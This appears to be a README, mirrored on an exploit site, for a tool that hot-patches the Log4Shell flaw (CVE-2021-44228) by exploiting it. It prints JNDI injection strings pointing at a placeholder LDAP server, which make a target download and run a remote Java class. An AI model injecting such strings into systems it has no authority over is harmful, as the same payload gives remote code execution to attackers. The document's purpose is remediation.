## https://sploitus.com/exploit?id=8D0CF3A6-EC3F-536C-A424-08879FF2F158
# cve-2021-44228-qingteng-online-patch
## What is this
Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.
## How to use
Inject the following code to anywhere likely vulnerable to CVE-2021-44228,
```
${jndi:ldap://your-own-server/patch}
```
To prevent MITM attack during the patch process, the following payload is recommended, but with less compatibility for older versions of Java,
```
${jndi:ldap://your-own-server/any_string_except_patch}
```
## Run your own server
1. Download the latest [releases](https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch/releases)
2. Specify system environment variables ```LOG4J_HOTFIX_HTTP_PATH``` and ```LOG4J_HOTFIX_HTTPS_PATH``` if you want to host Hotfix.class on your own server
## Build
Please note Hotfix.java should be compiled with JDK6 for maximum compatibility.